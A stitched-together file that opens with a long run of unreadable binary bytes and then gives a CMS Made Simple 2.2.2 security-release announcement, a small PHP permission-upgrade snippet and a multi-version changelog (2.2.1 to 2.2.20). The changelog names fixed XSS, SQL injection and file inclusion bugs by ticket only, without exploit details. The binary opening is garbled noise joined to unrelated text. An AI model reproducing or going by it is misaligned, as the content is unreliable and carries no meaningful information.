�Vf7	�iA���X�V���-�3}N�N��f&r	%�_m#<1
�{����XM�S1�Q*V�dk	-T�ö�@�	�Uj��ڑ(�I{��s�dL�q��Mi�B��`œ�k)�`��G߻|�d��D��ʜ������E"i��d+��G���9�w�ŏ?L�{�ң)�a�l��*�"��yN���I��!��	�5!��q�"�]��f���4��ݑeSW1�($�C"͊�^�<�����y�j3���e�C������ķ�p%�������q>w�8�ci�x�x��Z���vJ��(���<�xΦM�F�����PL߰��-1��~?����W�o��js�3Q������ݱ�ysm�o���f��=�<�<�G���Q�xg|V���n�{x�ӓ��Ś�c�JIjt �/�ˆV��O��	뱊	�T���bj,Q��+`;�Ruq�]n�A��NW`�5)
6�R�b@�!�8O�WS{x��Q�BH�
1hc��i*!q�����3�9�Dv�r���D*�� ��)/�����5��~./�F���*�Hf�1�V|jH���l0&�Up��J	*Y<�ݎ���W�����j��]ظnd6�KCF�7-x�)��~�2�XrRv��HR�5@/ij�^u��H����,38��ca��J�Z�	� ��;��O���Q3�����ۜLsD�{�’]-E�;��oG�B&��ʠ+1UC�1��P����ݻIwwh�ƶ�!�[�V�
{�C���׫Ipel��`��<F���S�*���j��S����3�	/�@�䈽�Nϲ}3	�j/�C��Rq n 0ՄŊ�̓���F�5@�:��j5ZyhD	]�,�y�_���t�[�%[x�`	6zk"w�	�j�����W��q�$���`Rg/ Nlv��2k�Ӳ���Rh$�4��S�9����B��R�ӂ�Xo=ă͝\n9w�+xM�G�Y5��?N��K��|m	���zq9yP�,5����'��3�w[�6,b�O�_']�v��Yh@<�NVk�hY���<%#\�&�>��狷�O�ƀխA�
���d�/�eAV6�:vO�^Ⱟ�k=�j�����f)�f�����ד��
��9_b�I�1�Y)�!�3Z��r9d�+rD続��@�0�;'�L��Z��.�64zF6�f6}��B�m%ǒ^3�ڒ�b��� �o������[T�$��{�B�}͋��aZ��d	ZaZC�f�b`����gY�O�;�glS��I���])�B�����|�5B��P �Ҭ�(�n+K5(��͍ǐN��fbٷ����a����l�,kGg�Z���B�A̠�r`nI����	�b��l�te�,�#1)�K��Ҕ��m�A�rj�a��T�?��X��ZCgi�p�����$����me(���AZ�N�Y�~�����3W���`/PCƑ6["�;�\��"p�\�BA�aL���B2�f*���;��!E�dt~�`s3�Jp�������A�w���V��Dl��Y��-~��T�
�AW(XԨg|�Se��\M�'|�����/�����4�%+׼x��tq�s��3o
P�&�TI����Yh��)wk3�ǵ�q�B�O!QW2@	7�n
���1����|Z���'�0�v��W'm%Ml�!�;RQ�P+فI�,��œ���G�O�!��[��j�� 9C����b��⇓����H�
"�&!g�~8�y�i��I!�R����BK�ȶ��=��,�-Ӳ�V�8g!g(�0S���A�[��YP�[�x3����
�*�wk�$���83%�ɶ�+z*��ky���6c�Nx�锧Rw�Dlq6j�E�-��=5+�����H�)��Lr��y&�jj�
�*go���i�Tl�\gU�nZ�=Cxm@`�U5�V7kC�W�e����`! ,J�+�S�.D1�<8x��p�T���9B�0�{�o^��גa2��)lz	5�w�5�^�����0��P�&w���2Ҡ̣�����G�@�ES]�6�xӠ�3�w�W�{��\�^?�X�fݗgS��ɧ�P_K-�R�0�(���b��}�q��ba	bVAҸ0���Ȥ���
=�FV��=<���,}�[��\݃�ZCa6���%y<��~7��7π�����	��9��:��q���Q=��7'�jz�`�V��
�Qew���엛���Occm]�wA+oh-Ī5ѱ�x���s�C%�b�~�Cֺ���); z<
v�y����~v��M��j����I*���4�]ek[�i�_
��\�EV��>m��ː�2�
@�(�S�-��/iMg�=^�b!����y�1��cӬ��
�ֆ�@�Y�?�h���a��;� .��g)�3����v����7�I��kT��U��t�c�cɓS�?���SD�=-&�n��}h[�k��X�露+�vq�v:�=)�b}��-�z�$�.m<ʓ3��4G�����(��ִ:n�9�=tN�����w%{�V��MD�WR��ɡ�p�1
"0��,�v') 7<'l�)U#N2�H�O����h�٫��������	RֳV3���4�1���/��ٔ�ޜ&x�[-�ō����?������'U�\�Z��m�E��6nP�0��a!c��3���{J�(�
f�,��5�VY�{�v�
��k�q�]\헧���V��A�-T�n8���M/�ޟ?���BV��<�+-�^�NS%� $��1�'w�^���7ۻW�,N����RhcO��!�#Wiw���-W������^��-��l4�A|� �r�I�B�^���v2S�KJ4N�@Mѱ�9K2
�]��X���j�o�L.v}s��
�
0�C`��=P�����Uw|�Q�2�$S*�@�%�t���Z�zԾ�^`���i�ED*|p�!�r�Ƚ�$R��b��~xR��1)�e�F�Pآǣ{�3�]��b����q�!EN�о'����8<�Oa�erXЛK��M��ZN��X�?8NO�6��np���	}�y�'�;)�`B2IT�9s�h�,I�dA�q��GM���IX��\�ƍ��@V5�!ִ��gz���l/u}��z�|�khЭ\�w(��EkP��o/�~f�7#����n�Lm]LK�N�K�ZR�o�/߼�lC�X ��3zَ�5�0;�Nto�An״�[���/�}s����p�>4a]�������8����^�ns��S��چ�0,#���8��0�����Z����j#'���Ɨ�B�1�(��Z@���%xsH��@��-��X��$s��Xa��~>�0�S�C���Z���ͥ�LV�6�M��'���G������貹�D9�r��8��F�%�Y�:N�r��ke��w r��t��3f�Z����#9H��X��".��y���@٩(F�g�u�d5hdL��J�zS�m#�n��ǟ�O/�p]vh/J�Jrc:��A^G�T�n?�rZ!�Ud;AMC���`*Dq��Ƕ��ӧ�8��)�Qh|��Q�5('���]�9~
]#�8d-(����1���<�����(%lx�����9����a����.
�[���(�#/���*j�ĵ�1`_S�&�����(:6'��y| !\;t�)Ӱ���:q��Q��k�����E�w�m�=m��P_�����İ�0�"/Bc�f��<H��7*���(z�N����
����)���8����'�[w��ʸ$;��X�fxޖ*1���/��T�$>�N�2����8C���e�8��	����tw0,���P�[0�,W�XZs��w�����sq�AContinuing with our commitment to quality code, we are announcing the release of 2.2.2 "Hearts Content", a security and stability release.

This release fixes or blocks a couple of very important security issues, addresses a number of bugs that existed in the system, and generally improves stability and usability.

Some important things to note are:
a:  The security issues addressed effect all previous versions of CMS Made Simple, not just the 2.x series.

b:  Due to the security fixes, Smarty resource specifications with paths or wildcard characters will no longer work.   This will affect a few third party modules--notably JMFilePicker.   The maintainers of affected modules should be able to address this issue without too much difficulty.   Additionally, any and all occurrences of {php} tags that may have been able to function in old versions of CMSMS should now fail.

c: We have once again changed the template processing order, specifically related to mact preprocessing.   Now, mact-preprocessing occurs AFTER the top portion of the template, but before the body portion.  This specifically addresses issues with multi-lang sites.  As of now, the template processing order is:
        1.  The top portion of the page template
        2. mact-preprocesing (if enabled) caches a module action intended for the {content} block
        3.  The body portion of the page template
        4.  The head portion of the page template.

d: fixes to cms_selflink, to content pages and to various API functions such that entirely numeric page aliases are invalid.  This is to prevent them from being confused with numeric page ids.
When adding or editing a page, if the resulting page alias is entirely numeric (i.e: 12345 or 123-123) then a non-numeric character ('p') will be prepended to the alias.    aliases such as 123-foo are not entirely numeric and therefore are valid.

e: Upgraded MicroTiny to use TinyMce 4.6.x and added the tabfocus and hr plugins.

As usual, a complete list of the items fixed and changed are available in the changelog that is displayed during the upgrade process and included with the release.

Because this is a security release as well as a stability release we encourage everybody to upgrade their websites as soon as possible.

Again we would like to thank  Daniel Le Gall from SCRT SA, Switzerland for identifying these vulnerabilities, reporting them to us in a professional manner, and working with us to ensure that they were resolved.

The CMSMS Dev Team now only officially supports CMSMS 2.2.2 and CMSMS 2.2.1.  Therefore, it is to your advantage to upgrade as soon as possible.

Thank you, and have fun with CMSMS.
<?php
$sql = 'SELECT permission_id FROM '.CMS_DB_PREFIX.'permissions WHERE permission_name = ?';
$tmp = (int) $db->GetOne($sql,[ 'Manage Users'] );
if( $tmp < 1 ) {
    status_msg('Create missing "Manage Users" Permission');
    $new_id = (int) $db->GenID(CMS_DB_PREFIX.'permissions_seq');
    $sql = 'INSERT INTO '.CMS_DB_PREFIX.'permissions (permission_id,permission_name,permission_text,permission_source,create_date,modified_date)
            VALUES (?,?,?,?,NOW(),NOW())';
    $db->Execute( $sql, [ $new_id, 'Manage Users', 'Manage Users', 'Core'] );
}
Version 2.2.20 - Saguenay
-------------------------------

Core - General
 - Compatibility fixes for PHP 8.2 and 8.3;
 - Smarty upgraded to version 4.5.2 (latest of the stable 4.5.x branch);
 - Made some changes to keep backward compatibility with previous versions of Smarty;
 - Fixed BR #12683: we now truncate the item_name at 50 characters;
 - Moved php files with functions to a specific folder tidying up for further changes;
 - Deprecated cms_html_entity_decode: scheduled to be removed; PHP native html_entity_decode now supports UTF-8 properly;
 - Fixed BRs #12677 and #12703: UDTs errors are now handled more gracefully - the error being triggered is shown on the popup;
 - News module is no longer mandatory;
 - New module added to core (UserGuide);
 - Installer now supports optional modules (News and UserGuide);
 - MenuManager is no longer installed back on upgrades;
 
Content Manager 1.1.13
 - Fixed a typo in admin_editcontent.tpl;
 
CmsJobManager 1.0.0
 - Considered a stable release, version is now 1.0.0;
 - Compatibility fixes for PHP 8.2 and 8.3;
 
DesignManager 1.1.11
 - Compatibility fixes for PHP 8.2 and 8.3;
 
FilePicker 1.0.8
 - BR #12671 - fix FilePicker prefix error;
  
MicroTiny 1.6.5
 - Compatibility fixes for PHP 8.2 and 8.3;
 - Removed mt_jsbool as it is not needed any longer and was breaking Smarty compatibility; 
 
Navigator 1.0.11
 - Compatibility fixes for PHP 8.2 and 8.3;

News 2.51.13
 - Compatibility fixes for PHP 8.2 and 8.3;
 - News is now an optional module, no longer installed by default;
 
UserGuide 1.0.0
 - Initial release;
 
Phar Installer Not SET
 - Compatibility fixes for PHP 8.2 and 8.3;
 - Supports core optional modules selection on advanced mode (currently News and UserGuide);
 - Modified Smarty 4.2.1 enough to work with PHP 8.3;
 - Regular Phar doesn't support Windows at this point while Expanded Phar does; 


Version 2.2.19 - Selkirk
-------------------------------

Core - General
 - BR #12647 - Wrong default action value in get_pageid_or_alias_from_url;
 - FR #12638 - ability to add CSP headers on the backend: currently weak restrictions: self with script-src and script-src-elem set to unsafe-inline (optionally set on config admin_csp_header);
 - BR #12661 - fix page_selector allow_all parameter and set default to false;
 
Content Manager 1.1.12
 - BR #12635 - Apply button is shown for non-existing page;
 - BR #12474 Taking the default page down by accident through the content type;

File Manager 1.6.16
 - BR #12659 - FileManager upload Warning bug fix;

FilePicker 1.0.7
 - BR #12621 - FilePicker upload bug;
 - BR #12659 - FilePicker upload Warning bug fix;

Navigator 1.0.10
 - BR #12528 Navigator call doesn't clear excluded prefixes in some situations

Version 2.2.18 - Apex
-------------------------------
Core - General
 - Fallback function CMSMS\strftime. PHP Intl extension still recommended. The fallback solves issues on hosts that don't install it by default and don't allow users to install it.

Version 2.2.17 - Iqaluit
-------------------------------
Core - General
 - BR #12529 - Cacheable Pages have Bad Header Last-Modified;
 - BR #12543 - Lib file corrections;
 - BR #12618 - HasChildren() is broken;
 - BR #12587 - can't uninstall modules;
 - Compatibility fixes for PHP 7, 8.0 and 8.1;
 - Smarty upgraded to version 4.2.1;
    Note: Smarty 2 syntax is still supported, but deprecated
 - Add function CMSMS\strftime to replace deprecated PHP function. PHP Intl extension recommended to support this.
 - Enabled use of PHP functions trim,ltrim,rtrim in smarty templates
 - PHPMailer upgraded to version 6.6.0.
 - fixes BR #12529 Cacheable Pages have Bad Header Last-Modified;
 - added module's support for arrays in parameters;
 - Fixes to cms_mailer class mainly in terms of proxy design pattern getters and setters and autotls settings;
 - Smarty security policies changes: due to some modifications in the way updated Smarty now behaves, all static classes need to be registered for its use to be allowed in templates.

Content Manager 1.1.10
 - Differentiate new page from cloned page.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

Design Manager 1.1.10
 - BR #12545 - Module: DesignManager typo info on top file.
 - fixes typo BR #12545
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

FilePicker 1.0.6
 - BR #12539 - Module FilePicker 1.0.5 files corrections.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

Module Manager 2.1.9
 - BR #12541 - Module ModuleManager 2.1.8 : corrections + compatible php 7.1.0 to 8.1.4.

News 2.51.12
 - BR #12543 - Lib file corrections.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

FileManager 1.6.13
- Compatibility fixes for PHP 7, 8.0 and 8.1.


Version 2.2.16 - Truro
-------------------------------
Core - General
  - BR #12370 - Admin Log-Download : now downloading the log honors all filters but doesn't process paging.
  - BR #12437 - Installer won't allow "<" symbol in database password.
  - BR #12457 - Event Manager empty list when mysql mode only_full_group_by.
  - BR #12484 - Cannot exit after Run UDT.
  - BR #12495 - MySQL 8.0.2+ breaks groups without table prefix.
  - BR #12499 - adminlog.tpl Wrongly formed date.
  - BR #12500 - NameQuote function does not work properly.
  - BR #12504 - Function call notification.
  - Fixed an issue with specific characters in a content block tab name breaking the editor.
  - Adjust regex's incompatible with PCRE2.
  - Avoid deprecated strftime() - deploy new replacement function locale_ftime() and new modifier-plugin localedate_format.
  - A number of fixes for PHP 8 compatibility.

Admin Search v1.0.6
  - BR #12443 - Admin Search fails on some searches with default mysql mode only_full_group_by (mysql 5.7.5+).
  - Removed license and copyright notices from module help text.
  - Escaping the search input field values.
  - More content object attributes are searched.
  - User Defined Tags can be searched.
  - Only places a user has permission to search are shown in the filter list (cached!).

Content Manager v1.1.9
  - Fix menu text/title setting.

FileManager v1.6.12
  - BR #12435 - Replacing an image file in filepicker doesn't update thumbnail.

FilePicker v1.0.5
  - FR #12483 - Additional FilePicker Help for usage as Content Block.

Navigator v1.0.9
  - BR #12456 - Navigator breadcrumbs with default page hidden from menu causes PHP notice.

Search v1.53
  - Added 'Manage Search' permission.
  - BR #12391 - Core search issue page/entry titles that start with numbers.
  
Phar Installer v1.3.15
  - Fixed BR #12437 - Installer won't allow "<" symbol in database password.
  - Added Russian lang file to installer.
  - use locale_ftime() instead of deprecated strftime().
  - escape name of groups table, to prevent reserved-word conflict when table-prefix is empty.
  - alterations to the links in final step: we now privilege links to CMSMS channels of contact and support.


Version 2.2.15 - Bonaventure
-------------------------------
Core - General
  - BR #12287 - Admin shortcuts popup refers to IRC.
  - BR #12292 - showbase parameter of metadata tag doesn't accept boolean value.
  - BR #12303 - No date displayed in the admin + category id not incremented.
  - BR #12305 - Removing actual Destination Page breaks Destination Page dropdown in Internal Page Link pages.
  - BR #12311 - log_performance_info - undefined variable: queries.
  - BR #12313 - 5 Stored XSS vulnerabilities in Settings - Content Manager.
  - BR #12317 - XSS on Settings News Module.
  - BR #12325 - Several XSS vulnerabilities.
  - BR #12335 - User pref admin homepage not properly displayed under certain conditions.
  - BR #12337 - GetContentBlockFieldInput $adding always false.
  - BR #12338 - Allow http/2 responses.
  - BR #12357 - Filepicker dropzone size issue.
  - FR #12345 - More user friendly admin session handling (partly implemented).
  - FR #12349 - Swap tabs on System Maintenance page.
  - Browsing to the main admin page in a new browser tab during a running session won't redirect to login form anymore.
  - (Error) messages in OneEleven won't dismiss on click.
  - Fix to Admin redirection after login on Windows platform.
  - Fix to the module API redirection to support arrays in parameters.

FileManager v1.6.12
  - Dropzone improvement like core FilePicker.

FilePicker v1.0.5
  - BR #11673 - FilePicker will not show svg images, when in the Content Manager.
  - BR #12312 - Stored XSS vulnerability in File Picker.

News v2.51.11
  - Minor code fix to encoding title content.
  - BR #12322 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12325 - Several XSS vulnerabilities.

Design Manager v1.1.9
  - Minor fixes for PHP warnings\notices.

Module Manager v2.1.8
  - BR #12291 - Reflected Cross site scripting.
  - BR #12324 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - Increased the Download Chunk Size field size to 4.

MicroTiny v2.2.5
  - BR #12351 - Escaping translation strings in tinymce_config.js.

Search v1.52
  - FR #11886 - Include module and modulerecord fields for content pages.

Phar Installer v1.3.13
  - Fixes to the reload button: now prevents browser's caching.
  - BR #11591 - fixed: Phar installer doesn't work with OPCache enabled.


Version 2.2.14 - T'Sou-ke
-------------------------------
Core - General
  - BR #12280 - Add Shortcut from Shortcuts modal broken.
  - Fixes to the class.CmsAdminThemeBase.php regarding main sections title and breadcrumbs generation.
  - Explicitly add function_exists and getimagesize functions to the allowed functions in PHP secure mode.
  - Improved Error Console template.
  - Site Prefs, remove submit confirmation.
  - System Maintenance, remove confirmation update page hierarchy positions and routes.
  - cms_http_request PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - Backend users, fixed the bulk actions.
  - BR #12172 - CronJobTrait undefined constants.
  - BR #12227 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12272 - Internal page link - selecting destination page problem.

AdminSearch v1.0.5
  - Remove click thru warning.

CMSContentManager v1.1.9
  - Fix notices in edit content template.
  - Fix notice in default admin view.

DesignManager v1.1.8
  - BR #12225 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

FileManager v1.6.11
  - Don’t disable advanced mode on upgrade.
  - Fix adding double // in site root link.
  - BR #12215 - FileManager 1.6.10 crashes when trying to rename a file.
  - BR #12224 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

News v2.51.9
  - Minor code fix.
  - Alert on unapproved articles disabled by default. Enable at Settings >> Options tab.
  - BR #12207 - Can't display image in news when using upload field.
  - BR #12228 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

Phar Installer v1.3.9
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - PHP 7.4 fix "Function get_magic_quotes_runtime() is deprecated".

Search v1.51.8
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".


Version 2.2.13 - Moosomin
-------------------------------
Core - General
   - Explicitly add a function or two to the allowed functions in PHP secure mode.

DesignManager v1.1.7
   - Fix a warning in PHP 7.3+.

FileManager v1.6.10
   - Fix minor XSS vulnerabilities in FileManager.

News v2.51.8
   - Fix a security issue in the default action with the idlist param.
   (This version was also separately released in the forge).


Version 2.2.12 - Osoyoos
-------------------------------
NOTICE: Due to the nature of the security issue fixed in FileManager after upgrading you should change your database password.

Core - General
  - Fix warning in cms_html_entity_decode.

FileManager v1.6.9.1
  - Security fixes for view action.


Version 2.2.11 - Vulcan
-------------------------------
Core - General
  - Fix minor bug in copying content objects.
  - Minor fix to array indexes when filling params in ContentBase.
  - Fix to the {cms_filepicker} plugin.
  - Minor fix to the 'my account' form.
  - Fix error in cmsms_filepicker.js encountered in LISE.
  - PHP 7.3 fix to DataDictionary::RenameColumnSQL.

CMSContentManager v1.1.8
  - Fix an issue with copying non-core content objects.
  - Minor fixes for php 7.3.

ModuleManager v2.1.7
  - Minor exception handling improvements.
  - Minor improvement to dependency detection with modules that do not exist in ModuleRepository.
  - Minor fixes for php 7.3.

News v2.51.6
  - Minor improvements for CMSMS v2.3 compatibility.

Phar Installer v1.3.8
  - Minor change to use include() instead of include_once()... not sure why.

FilePicker v1.0.4.1
  - Fix type error.

Search v1.51.7
  - Minor fixes for php 7.3.


Version 2.2.10 - Spuzzum
-------------------------------
Core - General
  - Fix minor potential authenticated object insertion vulnerability in changegroupperm.
  - Fix minor potential uncleaned input vulnerability in siteprefs.
  - Minor improvement to get_real_ip().
  - Fix to clearing cache in cms_filecache_driver.

News v2.51.5
  - Fix unauthenticated SQL injection vulnerability with the default action.

ModuleManager v2.1.6
  - Fix authenticated object insertion vulnerability in the installmodule action.
  - Improve ordering of the dependencies before installing or upgrading modules.
  - Adds more auditing, particularly in the cached request stuff.

FilePicker v1.0.4
  - Fix authenticated object insertion vulnerability.


Version 2.2.9.1
-------------------------------
Core - General
  - fix to the CmsLayoutStylesheetQuery class.
  - fix an edge case in the Database\Connection::DbTimeStamp() method.

MicroTiny v2.2.4
  - Minor fix in error displays.

Phar Installer v1.3.7
  - Fix to edge case in step 3 where memory_limit is set to -1.


Version 2.2.9 - Blow Me Down
-------------------------------
Core - General
  - PHP 7.2+ fixes.
  - Now do not call Module::InitializeAdmin() or Module::InitializeFrontend() if the module loading is being forced
    (as is the case sometimes within ModuleManager);
  - Minor changes and fixes to prevent warnings/notices in CLI based scripts.
  - Improvements to the {browser_lang} plugin.
  - Fixes a bug in the CmsLayoutTemplateQuery class.
  - Fixes a bug with the name= parameter in the {cms_stylesheet} plugin.
  - Fixes a minor issue in system information (smarty compilecheck).
  - Fixes a minor issue with the tabIndex and accesskey fields in edit content.
  - Fixes issue in the CmsLayoutStylesheet class related to associating designs with new stylesheets.
  - Now check for an english language file first in module_custom/xxxxx/lang before a file for the current language.
  - Prevent false-positive hit for "multiple_webshells_0018" rule webserver virusscanner (https://github.com/Yara-Rules/rules/blob/master/Webshells/WShell_THOR_Webshells.yar#L4764).
  - Fixes a bug in ContentOperations::LoadAllContent() if the content list had a custom content type from a module that was unvavailable.
  - Fixes a bug in the Database\Connection::DbTimeStamp().

Search v1.51.6
  - Minor fixes to help.

MicroTiny v2.2.3
  - More entropy in the mt_config.js filename to fix issues with js caching when switching users.
  - Fixes in the cms_linker plugin for when trying to change a link to a CMSMS page where the alias has changed.

FileManager v1.6.8
  - Fixes an upload issue.

ModuleManager v2.1.5
  - PHP 7.2+ fixes.

CMSContentManager v1.1.7
  - Fixes an issue with changing content type after copying a content page.

DesignManager v1.1.5
  - Fixes ownership issue on templates with importing a design.

Phar Installer v1.3.7
  - Minof fix to detect when PHP's memory limit is set to -1.


Version 2.2.8 - Flin Flon
----------------------------------
Core - General
  - Re-introduce the host_whitelist config entry that got lost in some commit somewhere.
  - Minor fix to pagination in Admin log.
  - Change Finnish locale priorities so that UTF-8 is first.
  - Minor fix to calling hooks with a single associative array parameter.
  - Adds new HookManager::do_hook_first_result() method.
  - cangegroupperms now calls HookManager::do_hook_first_result.
  - Minor enhancement to moduleoperations::_load_module() to check if the class exists.
  - Minor enhancement to {cms_action_url} wrt. the page to link to if not specified.
  - Deprecate CMSModule::SetParameterType and CMSModule::CreateParameter methods.
  - Deprecate ModuleOperations::GetModuleParameters() method.
  - CMSModule::RestrictUnknownParameters() now does nothing.
  - No longer warn if a module is sent a parameter that is not registered.
  Note: modules should now be cleaning parameters directly (see filter_var) from $_POST and $_REQUEST ($_GET is automatically cleaned).
  Note: In the future,  $params in module actions will only consist of parameters passed on the module tag.
  - PHP 7.2+ fixes.
  - Fix the inactive param in the page_attr plugin.

FilePicker v1.0.3
  - Minor fix to delete action.

Search v1.51.5
  - Now enforce utf-8 on preg_split.
  - Minor parameter check.
  - Removed deprecated each() function.

CMSJobManager v0.1.3
  - Notices fixed.
  - PHP 7.2+ fixes.

FileManager v1.6.7
  - Remove un-necessary files that may cause a security vulnerability.
  - prevent creating directories with leading or trailing whitespace in the name.

Module Manager v2.1.4
  - PHP 7.2+ fixes.

Navigator v1.0.9
  - Template fix simple_navigation.tpl. Output correct class for parent without active children.

News v2.51.4
  - Notices fixed.


Version 2.2.7 - Skookumchuck
----------------------------------
Core - General
  - Change internal CSRF variable name.
  - Fix object insertion bug via deserialize in LoginOperations.
  - Fix issue where login cookie contents could be forged by determining the hashing salt.
  - Refactor the mechanism for generating and verifying admin account password reset codes.

FileManager v1.6.6
  - No longer allow uploading files with names that end in .

FilePicker v1.0.2
  - No longer allow uploading files with names that end in .

Search v1.51.4
  - Minor fix to microtime calls.


Version 2.2.6 - Come by Chance
----------------------------------
Core - General
  - Fixes to AdminAlerts::load_by_name().
  - SetMessage() and SetError() in the module API now use session variables.
  - Remove support for module_error and module_action request parameters in admin module actions.
  - Add call to check_login() in admin actions that were missing them.

Search v1.51.3
  - Fix notice in PHP 7.1: A non well formed numeric value encountered...


Version 2.2.5 - Wawa
----------------------------------
Core - General
  - Fix minor security issue in the way login information was cached in cookies and the session.
  - Simplify rules around alias editing/generation in fillparams.
    If the alias field exists then we can adjust its value or recalculate an alias.
    Use basic properties, and ownership and permissions to determine if that field exists on the edit form.
  - Minor fixes to the CmsJobManager.


Version 2.2.4 - Little Paradise
----------------------------------
Core - General
  - Improvements to the Hook class.
  - Minor fix to usertagoperations.
  - Changes to the hierarchy selector to disallow circular references.
  - Fix problems with additional editors causing page aliases to be regenerated.
  - Minor fixes to Admin log browser.
  - Minor fixes to Admin login.
  - Add missing call Core::LoginPre hook.
  - Modify myaccount.php to call Core::EditUserPre hook BEFORE the password is set.
  - Fix documentation to CallUserTag.
  - Fix to default handling for content_image block.
  - Improve the help for the {page_attr} plugin.
  - Fix a potential warning in the {anchor} tag.
  - Fix boolean comparison in LoginOperations.

Installation Assistant v1.3.4
  - Fixes endless recursion issue with setting a tmpdir.
  - Fix issue with requiring a database prefix on upgrade.

FilePicker v1.0.2
  - Now allow specifying a 'useprefix' boolean parameter to the action url which will use the current top directory.
  - Add a prefix on all returned strings.
  - Slight modification to the profile class.
  - Now sends the FileManager::OnFileUploaded hook the same way as FileManager does.
  - Adds an exception handler around the change working directory stuff.

FileManager v1.6.5
  - Change upload action to call FileManager::OnFileUploaded hook before creating the thumbnail to allow a hook to rename the uploaded file.
  - Now enable creation of thumbnails on install.

MicroTiny v2.2.2
  - Minor fix for the filepicker if using a default filepicker profile that specifies a top directory.
  - Re-adds the table plugin (went missing when we upgraded tinymce).

ModuleManager v2.1.3
  - Adds audit line displaying status if cannot connect to ModuleRepository.

DesignManager v1.1.4
  - Fixes problems with the cancel button not marking the form as 'clean' (not dirty).


Version 2.2.3.1 - Happy Adventure
----------------------------------
Core - General
  - Fix an issue when parsing multiple content blocks.


Version 2.2.3 - Happy Adventure
----------------------------------
Core - General
  - Fixed a redirect loop problem on mixed HTTP/HTTPS sites when the secure flag was set on some pages.
  - Fixed a problem with prefilters and postfilters not working if placed in /assets/plugins.
  - Now use our own derivative of Smarty Internal Template so that we can send hooks, etc.
  - Improved error message if there was an error parsing the template (or a duplicate content block).
  - Fixes content blocks, image blocks, module blocks containing whitespace in the name.
  - Minor fix to {cms_filepicker} plugin.
  - Improve the CmsModuleInfo class such that if the module class file is newer it will be loaded.
  - Now generate the moduleinfo.ini file automatically on install or upgrade of a module.
  - Increase the maxlength attribute for password input boxes in myaccount.
  - Adds a StartsWith JavaScript shiv for IE11.
  - Revert the protocol-less URI for root_url (more changes coming for 2.3).
  - Get rid of the smart_url config option.
  - Fix a problem when testing for duplicate aliases of the form string-###  where the suffix integer was greater than 100.
  - More fixes to mact preprocessing if {content} was in the top of the template.
  - Minor fix to ExpandXMLPackage to not throw an exception in brief mode if module is not compatible with the current version of CMSMS.
  - adds new cms_entities_array function in misc to convert an array recursively to values.
  - Fixes transposed arguments in UserOperations::AddMemberGroup().
  - Better detection of duplicate content blocks.
  - Revert template_stack change to Smarty_CMS from 2.2.2.
  - Improvements to HookManager.

CmsJobManager v0.1.1
  - Optimization of audit logging.
  - Change connection timeout to 1 second.
  - Change processing to be a little more friendly to some environments wrt. content-size header.
  - Prevent processing from the CLI when root_url is calculated.

MicroTiny v2.2.1
  - Minor fix for filepicker plugin.

News v2.51.3
  - For security, no longer urldecode the detailtemplate parameter in detail view.
    This may have some implications for people that are specifying the detailtemplate parameter (with a template with special characters) from within a WYSIWYG (which is not recommended behavior).
  - Convert title and dropdown options and text fields to entities before display.

ModuleManager v2.1.2
  - Now sort modules in the installed tab a bit better.
  - Now handle module 'not available' a bit better.

FileManager v1.6.4
  - Add a different icon for navigating up one level.
  - No longer allow uploading any php (or derivative) file.
  - No longer allow renaming any file to have a .php extension (or a derivative).
  - Fixes an issue when improper/invalid values for root path and uploads path are manually specified in the config.php

FilePicker v1.0.1
  - No longer allow overriding the filepicker type on the URL.
  - No longer allow uploading any .php files.

CMSContentmanager v1.1.6
  - Now double check that the 'default parent' for new pages actually exists.

Navigator v1.0.8
  - Minor english documentation correction.

Installation Assistant v1.3.3
  - Now look for lib/include.php before include.php in step 8 and step 9 when connecting to CMSMS.
  - Fixes to upgrade routine for 2.1.5 wrt. the 'Manage Stylesheets' permission (ignore an exception).


Version 2.2.2 - Hearts Content
----------------------------------
Core - General
 - Additional security improvement in CMSModule::GetTemplateResource().
 - Now Smarty_CMS is no longer derived from SmartyBC (uses our own wrapper class) which prevents all occurrences of {php} tags from running.
 - Adds an admin directory .htaccess file to explicitly disable browser caching of any resources.
 - Fixes a relative path vulnerability in module_file_tpl resource.
 - Fixes a path building issue in CmsModuleInfo.
 - Fixes to parsing and generating moduleinfo.ini files.
 - Disallow any resource specifications with a * or a /.
     * This also means that no file resource specifications with path information will be permitted.
 - Move mact preprocessing to AFTER the template_top has been processed. So order of processing (for module actions on the frontend is)
     a:  template top
     b:  mact preprocessing (if enabled, which is the default)
     c:  template body
     d:  template head
 - Fix sureGetNodeByAlias to check if the input is numeric. If it is, assume that it is a page id, not an alias.
 - Fix alias generation in the ContentBase class to check if the input page title is numeric... If it is, prepend a character to it to ensure that integer casting will return 0.
 - Fix listtags to show tags using smarty_nocache_ function name prefix.
 - Improvements to the {form_start} plugin.
 - Fix silly, old issue in recursive_delete function.
 - Clean up more parameters from the content tag before passing to module action.
 - Fix local file inclusion vulnerability in listtags.
 - Now call get_userid() in debug_to_log instead of check_login()

AdminSearch v1.0.3
 - Now search the metadata field of content pages.
 - Fixes for single quotes in search results.

DesignManager v1.1.3
 - Set title attribute tags for edit/create template, stylesheet, design.
 - Remove debug statements.

MicroTiny v2.2
 - Upgrade tinymce to v4.6.x.
 - Adds new tabfocus and hr plugins.

News v2.51.2
 - Fixes so that all cancel buttons work properly on new News articles.

Navigator v1.0.7
 - Adds a silly __get() method to the NavigatorNode class squash some notifications in the error logs.

ModuleManager v2.1.1
 - Now handlle remote module installs upgrades, and activates via a 2 request process to allow new module versions to be read into memory.

Installation Assistant v1.3.2
 - Correction to assets warning

Search v1.51.2
 - Now do an html entity decode on all content added to AddWords.


Version 2.2.1 - Hearts Desire
----------------------------------
Core - General
 - Improve the Smarty plugin loading to handle non-cachable plugins in the /assets/plugins and /plugins directories.
